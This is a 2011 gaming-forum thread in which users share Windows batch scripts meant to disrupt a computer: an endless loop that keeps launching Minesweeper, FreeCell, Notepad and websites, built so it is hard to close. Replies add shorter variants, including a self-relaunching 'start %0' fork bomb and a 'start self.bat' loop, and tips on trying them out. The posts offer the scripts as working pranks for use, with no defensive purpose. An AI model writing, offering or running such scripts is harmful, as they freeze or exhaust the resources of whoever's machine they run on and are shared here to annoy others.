Post: Pop-Up That Never Ends (BATCH)
03-08-2011, 11:05 PM #1
tylerallmighty
Human After All
(adsbygoogle = window.adsbygoogle || []).push({}); This is a Batch/.bat file that pops up windows and never ends. Its ****ing crazy.

    @ECHO OFF
COLOR 84
TITLE .:MWAHAHAHAAHA!!!!:.

:MAIN
ECHO .
PING 1.1.1.1 -n 1 -w 2000 >NUL
cls
ECHO ..
PING 1.1.1.1 -n 1 -w 2000 >NUL
cls
ECHO ...
cls
PING 1.1.1.1 -n 1 -w 2000 >NUL
cls
ECHO ....
PING 1.1.1.1 -n 1 -w 2000 >NUL
cls
ECHO .....
PING 1.1.1.1 -n 1 -w 2000 >NUL
cls
ECHO Bombing Commencing In: 5
PING 1.1.1.1 -n 1 -w 1000 >NUL
cls
ECHO Bombing Commencing In: 4
PING 1.1.1.1 -n 1 -w 1000 >NUL
cls
ECHO Bombing Commencing In: 3
PING 1.1.1.1 -n 1 -w 1000 >NUL
cls
ECHO Bombing Commencing In: 2
PING 1.1.1.1 -n 1 -w 1000 >NUL
cls
ECHO Bombing Commencing In: 1
PING 1.1.1.1 -n 1 -w 1000 >NUL
cls
ECHO Times Up.
PING 1.1.1.1 -n 1 -w 3000 >NUL
cls
GOTO Bomb

:Bomb
START C:\Program Files\Microsoft Games\Minesweeper\MineSweeper.exe
PING 1.1.1.1 -n 1 -w 1000 >NUL
START C:\Program Files\Microsoft Games\FreeCell\FreeCell.exe
PING 1.1.1.1 -n 1 -w 1000 >NUL
START www.google.com
PING 1.1.1.1 -n 1 -w 1000 >NUL
START C:\Program Files\Microsoft Games\Minesweeper\MineSweeper.exe
PING 1.1.1.1 -n 1 -w 1000 >NUL
START www.tech-revolution.com
PING 1.1.1.1 -n 1 -w 1000 >NUL
START C:\Windows\system32\Notepad.exe
PING 1.1.1.1 -n 1 -w 1000 >NUL
START C:\Windows\system32\nslookup.exe
PING 1.1.1.1 -n 1 -w 1000 >NUL
START C:\Windows\system32\osk.exe
GOTO Bomb


You must login or register to view this content. if you dont know how to save it as .bat. :carling:
Its a pain in the *** to get rid of. >.< :rolleyes: lol. I dont think it works on Macs. :/
Yes, the errors are intentional. Its meant to keep you from closing it.
Last edited by tylerallmighty ; 03-08-2011 at 11:21 PM.
03-09-2011, 12:34 AM #2
    :A
start self.bat
goto A
03-09-2011, 12:35 AM #3
xScreamo!
Trading Kids For Angel Dust
Originally posted by Nathanx
This is a Batch/.bat file that pops up windows and never ends. Its ****ing crazy.

    @ECHO OFF
COLOR 84
TITLE .:MWAHAHAHAAHA!!!!:.

:MAIN
ECHO .
PING 1.1.1.1 -n 1 -w 2000 >NUL
cls
ECHO ..
PING 1.1.1.1 -n 1 -w 2000 >NUL
cls
ECHO ...
cls
PING 1.1.1.1 -n 1 -w 2000 >NUL
cls
ECHO ....
PING 1.1.1.1 -n 1 -w 2000 >NUL
cls
ECHO .....
PING 1.1.1.1 -n 1 -w 2000 >NUL
cls
ECHO Bombing Commencing In: 5
PING 1.1.1.1 -n 1 -w 1000 >NUL
cls
ECHO Bombing Commencing In: 4
PING 1.1.1.1 -n 1 -w 1000 >NUL
cls
ECHO Bombing Commencing In: 3
PING 1.1.1.1 -n 1 -w 1000 >NUL
cls
ECHO Bombing Commencing In: 2
PING 1.1.1.1 -n 1 -w 1000 >NUL
cls
ECHO Bombing Commencing In: 1
PING 1.1.1.1 -n 1 -w 1000 >NUL
cls
ECHO Times Up.
PING 1.1.1.1 -n 1 -w 3000 >NUL
cls
GOTO Bomb

:Bomb
START C:\Program Files\Microsoft Games\Minesweeper\MineSweeper.exe
PING 1.1.1.1 -n 1 -w 1000 >NUL
START C:\Program Files\Microsoft Games\FreeCell\FreeCell.exe
PING 1.1.1.1 -n 1 -w 1000 >NUL
START www.google.com
PING 1.1.1.1 -n 1 -w 1000 >NUL
START C:\Program Files\Microsoft Games\Minesweeper\MineSweeper.exe
PING 1.1.1.1 -n 1 -w 1000 >NUL
START www.tech-revolution.com
PING 1.1.1.1 -n 1 -w 1000 >NUL
START C:\Windows\system32\Notepad.exe
PING 1.1.1.1 -n 1 -w 1000 >NUL
START C:\Windows\system32\nslookup.exe
PING 1.1.1.1 -n 1 -w 1000 >NUL
START C:\Windows\system32\osk.exe
GOTO Bomb


You must login or register to view this content. if you dont know how to save it as .bat. :carling:
Its a pain in the *** to get rid of. >.< :rolleyes: lol. I dont think it works on Macs. :/
Yes, the errors are intentional. Its meant to keep you from closing it.


It will end if I log off and log back on right? Cuz Imma try it right now =D
03-09-2011, 12:46 PM #4
tylerallmighty
Human After All
Originally posted by xScreamoV2 View Post
It will end if I log off and log back on right? Cuz Imma try it right now =D


It should. Smile

---------- Post added at 07:46 AM ---------- Previous post was at 07:45 AM ----------

Originally posted by TheUberFail View Post
    :A
start self.bat
goto A


Wait, What? O_o
03-09-2011, 12:49 PM #5
Originally posted by Nathanx
It should. Smile

---------- Post added at 07:46 AM ---------- Previous post was at 07:45 AM ----------



Wait, What? O_o


save it as self.bat and see what happens Happy

The following user thanked TheUberFail for this useful post:

tylerallmighty
03-09-2011, 12:52 PM #6
tylerallmighty
Human After All
Originally posted by TheUberFail View Post
save it as self.bat and see what happens Happy


I'm not that stupid. Not Happy or Sad Lol
03-09-2011, 08:52 PM #7
schnzrs
Do a barrel roll!
Even easier.
    :loop
start
goto loop
03-10-2011, 06:58 PM #8
tylerallmighty
Human After All
Originally posted by schnzrs View Post
Even easier.
    :loop
start
goto loop


:???: I don't get it.
03-10-2011, 06:59 PM #9
viralhysteria
74261700027
Originally posted by schnzrs View Post
Even easier.
    :loop
start
goto loop


FINALLY! Another person who takes the easy route! :love:
03-12-2011, 11:48 PM #10
or you can use this

    @echo off
:s

START %0

GOTO :s



its called a fork bomb and opens loads of cmd windows if you want to open it do it from a memory stick because if it does get out control (it will) you can yank it out and it will stop

Copyright © 2024, NextGenUpdate.
All Rights Reserved.

Gray NextGenUpdate Logo